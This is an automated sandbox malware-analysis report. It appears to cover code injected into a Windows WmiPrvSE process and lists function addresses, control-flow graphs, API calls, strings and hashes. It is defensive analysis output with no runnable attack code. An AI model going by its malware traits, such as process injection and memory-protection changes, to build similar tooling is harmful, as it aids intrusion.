2534cf69a54-2534cf69a74 call 2534cf68a34 * 2 call 2534cf6a8ac 532->545 537->532 543 2534cf69a3d-2534cf69a42 537->543 539->479 543->466 543->532 569 2534cf69a76-2534cf69a80 call 2534cf6a99c 545->569 570 2534cf69a8b 545->570 563 2534cf69c15-2534cf69c72 call 2534cf69870 546->563 564 2534cf69bf0-2534cf69c02 546->564 551 2534cf69c7b 547->551 552 2534cf69c0c-2534cf69c10 547->552 557 2534cf69c80 551->557 552->519 557->523 563->557 564->546 564->547 573 2534cf69a86-2534cf69def call 2534cf686ac call 2534cf6a3f4 call 2534cf688a0 569->573 574 2534cf69df0-2534cf69df5 call 2534cf6baa8 569->574 570->472 573->574 574->513
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: cedc45b2039a669dff0fc799c37f554eb18c62e3ff41ad17fc00d577efd92c3d
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: AFE1AF32704B488AEB60DF65D88839D77A0F755BCAF502115EE8957BA9CB38C392C734
                        Function 000002534CF9A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 584 2534cf9a544-2534cf9a5ac call 2534cf9b414 587 2534cf9a5b2-2534cf9a5b5 584->587 588 2534cf9aa13-2534cf9aa1b call 2534cf9c748 584->588 587->588 589 2534cf9a5bb-2534cf9a5c1 587->589 591 2534cf9a690-2534cf9a6a2 589->591 592 2534cf9a5c7-2534cf9a5cb 589->592 594 2534cf9a963-2534cf9a967 591->594 595 2534cf9a6a8-2534cf9a6ac 591->595 592->591 596 2534cf9a5d1-2534cf9a5dc 592->596 599 2534cf9a9a0-2534cf9a9aa call 2534cf99634 594->599 600 2534cf9a969-2534cf9a970 594->600 595->594 597 2534cf9a6b2-2534cf9a6bd 595->597 596->591 598 2534cf9a5e2-2534cf9a5e7 596->598 597->594 602 2534cf9a6c3-2534cf9a6ca 597->602 598->591 603 2534cf9a5ed-2534cf9a5f7 call 2534cf99634 598->603 599->588 610 2534cf9a9ac-2534cf9a9cb call 2534cf97940 599->610 600->588 604 2534cf9a976-2534cf9a99b call 2534cf9aa1c 600->604 606 2534cf9a6d0-2534cf9a707 call 2534cf99a10 602->606 607 2534cf9a894-2534cf9a8a0 602->607 603->610 618 2534cf9a5fd-2534cf9a628 call 2534cf99634 * 2 call 2534cf99d24 603->618 604->599 606->607 622 2534cf9a70d-2534cf9a715 606->622 607->599 611 2534cf9a8a6-2534cf9a8aa 607->611 615 2534cf9a8ac-2534cf9a8b8 call 2534cf99ce4 611->615 616 2534cf9a8ba-2534cf9a8c2 611->616 615->616 628 2534cf9a8db-2534cf9a8e3 615->628 616->599 621 2534cf9a8c8-2534cf9a8d5 call 2534cf998b4 616->621 652 2534cf9a648-2534cf9a652 call 2534cf99634 618->652 653 2534cf9a62a-2534cf9a62e 618->653 621->599 621->628 626 2534cf9a719-2534cf9a74b 622->626 630 2534cf9a751-2534cf9a75c 626->630 631 2534cf9a887-2534cf9a88e 626->631 633 2534cf9a9f6-2534cf9aa12 call 2534cf99634 * 2 call 2534cf9c6a8 628->633 634 2534cf9a8e9-2534cf9a8ed 628->634 630->631 635 2534cf9a762-2534cf9a77b 630->635 631->607 631->626 633->588 639 2534cf9a900 634->639 640 2534cf9a8ef-2534cf9a8fe call 2534cf99ce4 634->640 641 2534cf9a781-2534cf9a7c6 call 2534cf99cf8 * 2 635->641 642 2534cf9a874-2534cf9a879 635->642 648 2534cf9a903-2534cf9a90d call 2534cf9b4ac 639->648 640->648 665 2534cf9a804-2534cf9a80a 641->665 666 2534cf9a7c8-2534cf9a7ee call 2534cf99cf8 call 2534cf9ac38 641->666 645 2534cf9a884 642->645 645->631 648->599 663 2534cf9a913-2534cf9a961 call 2534cf99944 call 2534cf99b50 648->663 652->591 669 2534cf9a654-2534cf9a674 call 2534cf99634 * 2 call 2534cf9b4ac 652->669 653->652 657 2534cf9a630-2534cf9a63b 653->657 657->652 662 2534cf9a63d-2534cf9a642 657->662 662->588 662->652 663->599 673 2534cf9a80c-2534cf9a810 665->673 674 2534cf9a87b 665->674 684 2534cf9a7f0-2534cf9a802 666->684 685 2534cf9a815-2534cf9a872 call 2534cf9a470 666->685 690 2534cf9a68b 669->690 691 2534cf9a676-2534cf9a680 call 2534cf9b59c 669->691 673->641 675 2534cf9a880 674->675 675->645 684->665 684->666 685->675 690->591 694 2534cf9a9f0-2534cf9a9f5 call 2534cf9c6a8 691->694 695 2534cf9a686-2534cf9a9ef call 2534cf992ac call 2534cf9aff4 call 2534cf994a0 691->695 694->633 695->694
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction ID: 83b48ec1d077457499048f56674a00a6029857d6d74a1c26e7f405f77ef68fcf
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: 58E19E72600F488AEF60DF65D88839DB7A0F7457D9F112125EE8957B99CB38C681CB24
                        Function 000002534CF9F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: 4eced2d1dd9186fd5b10d210237559a66dfb395b3508132be4cd6a27d2cbdec3
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: 4D41D232311E0881FF16CB1AEC08755A391F749BE2F5961259D0A8B788EF3CC6458B3C
                        Function 000002534CF9104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: e927927bb38551d0b9d4f45b83d57f70a97df837d7680b4eaa54c2d7f96199d3
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: 28415E76214F88D6EB60CF21E84839AB7B5F388BD9F049129DA8907758DF3DC585CB24
                        Function 000002534CF9D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D087
                        • FlsSetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D0A6
                        • FlsSetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D0CE
                        • FlsSetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D0DF
                        • FlsSetValue.KERNEL32(?,?,?,000002534CF9C7DE,?,?,?,?,?,?,?,?,000002534CF9CF9D,?,?,00000001), ref: 000002534CF9D0F0
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: 41d44c75d4b2457e64776896c796c5e007bcf3e0c574cbc87217c4d3b4c4c12f
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: B1115E31704A4C41FE68E7269D5D379A1515B847F2F387324A939076EAEE3CC6428F38
                        Function 000002534CF97510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 2fd2608fdd1211338c9734535b40e593d6acdef1f7de804d9e8caa3e3a4f4447
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 6C81B331600F0D86FF54EB259C49399E6A0A785BC2F14B427DA04877AAEB3DC7458F38
                        Function 000002534CF99DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: b43c9f2ab16254cd1f2e3c115cbfae8e9ebd510332e8c0a71c4c46cf07ee8cf7
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: B031E731312E44D1EE52EB42AC08795A294F748BE1F1A25259D1D07B90EF3DC3858B38
                        Function 000002534CFA3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 07a8d41bfeedb0d4c3c86574e8f2a826507f240d56ae809e2b6400b767bee90d
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: A011B231310F8883E750CB12EC58319B6A0F388FE6F045215EA2A87794DF3DCA048768
                        Function 000002534CF93790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: a6493bf056a0438285f3c0b8694f1dff551606326c8ed50b8942cd29f198f011
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: B9115E3A704F4582EF14DB12E80826AA6A0F748FC6F455029DE9907764EF3EC649CB28
                        Function 000002534CF95B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction ID: a5b2469d1511555b14123b9b5485a4073d553594469f9a54d61cabe2988fb088
                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                        • Instruction Fuzzy Hash: 99D19D76209F4881DA70DB1AE89435ABBA0F388BC5F105216EACD47B69DF3CD651CF24
                        Function 000002534CF92F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: 7663dc7bf17fc5fe6a3a2d294d4060912201f2bca28c875475bff2552975c244
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: 9C31D236701F5982EA14DF56ED48729E7A0FB44BCAF0860209E4907B65EF3CC6A5CB34
                        Function 000002534CF9CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: f95a6cc405d3c87c420d874699386ead1cad166d02285fde4b5aec12a7c91dcd
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: D9116D30200E4841FE64E7325D4D329A2526B847F6F246724A936476EAEE3C86019F38
                        Function 000002534CF9199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 19a78f3271c08fa92a2d3bb1cfb180086516d63fb4c1913a1cce41f12a818499
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: 62016931300E4882EB24DB52A84C35AA3A5F788FC6F889035DE5943755DF3DCA8AC724
                        Function 000002534CF936C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: 593f7399cfa294ac90c854531880f2d4f99691f3101b391e5e0680ebf12aa757
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: E9010979611F4886EF24DB62EC0C32AA2A0FB49FC7F045424C95906764EF3EC248CB38
                        Function 000002534CF99005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: d4d39927be187ed5c5f17ba9199a94246eb0682ae2d5496d6d30bec27fce7870
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: 0751B532701A088AEF54DB15EC4CB59B7A5F344BC9F53A124DA1A43B48DB79CB81CB38
                        Function 000002534CF98FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 3b5ecdca5592297688fdb70718cee288d97b5987abc6a79a2048bbdd886acfc0
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 17319332200A4496EB14DF21EC4C719B7A5F744BCAF169514EE5A07B59DB3ECB81CB38
                        Function 000002534CF91A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: afedcdf10490bc59e1e16d3a39bab99468e138ca10dee16280622698a6b6d981
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: 30F08132300A4882EB60CB21EC88359E761F748BC9F94A020CA4946554DB7DCB8ECB24
                        Function 000002534CF9BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 10dc7ad9069a52359524467aa6e40d0f7ad6da848b1c4c06426e1e09ecd697b2
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: 58F04F71221E0881EF20CB25AC48359A360EB85BE2F5422198A6A452F4CF3EC6458774
                        Function 000002534CF93044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: 169fdc341a69a9214f44a9d34521551635983f9b48094eb7e62a5718eb473e7b
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: A5F05830204F8882EA04CB12BD08119E260EB48FC6F18A020EE5A07B28DE3DC64A8738
                        Function 000002534CF950D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction ID: 09d17569973177fe28b38372ce3407ce51e95f8b5e79cf97ab1a6745fe4387ab
                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                        • Instruction Fuzzy Hash: 3402DA32219B8886EB60CB55F89435ABBA0F3C47C5F105115EA8E87BA9DF7CD544CF24
                        Function 000002534CF95710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction ID: 9e0e80b7ee65ffd4612b114093426ee84eb65cf02cd4d142d681c87835823808
                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                        • Instruction Fuzzy Hash: BB61EF36519F48C6EB64CB15F84831ABBA4F3887C5F106215EA8D47BA8DB7CD644CF28
                        Function 000002534CF73504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: a7ea18857f0c2aaebc1769a352cc7adad51a7e1654ed8dc536a7df88c33d9cd7
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 9711A733651E1B31FA549728EC4D37931C16B5C3F6F486638A966062D6CA3CCB4D4338
                        Function 000002534CFA4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 06d06f76227022a9f5d1212550cd0901f3909c4b44ef6588e9c3e8ff2161f59b
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: EE112B32A50E4811F66A9118EC1D3658950EB78BF6F0A3A34A53607ED6C63EC740633C
                        Function 000002534CF6F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725938255.000002534CF60000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002534CF60000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf60000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: bde2a73a6c5fdac79e55196d6dd89301c99b45748ce3786731260929158328df
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: F4619D72700E4882FA69DB64ED4C32A2BA1A7857C2F517525CA4A077B5DB3CCA438738
                        Function 000002534CF9AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.2725997020.000002534CF90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002534CF90000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_2534cf90000_WmiPrvSE.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
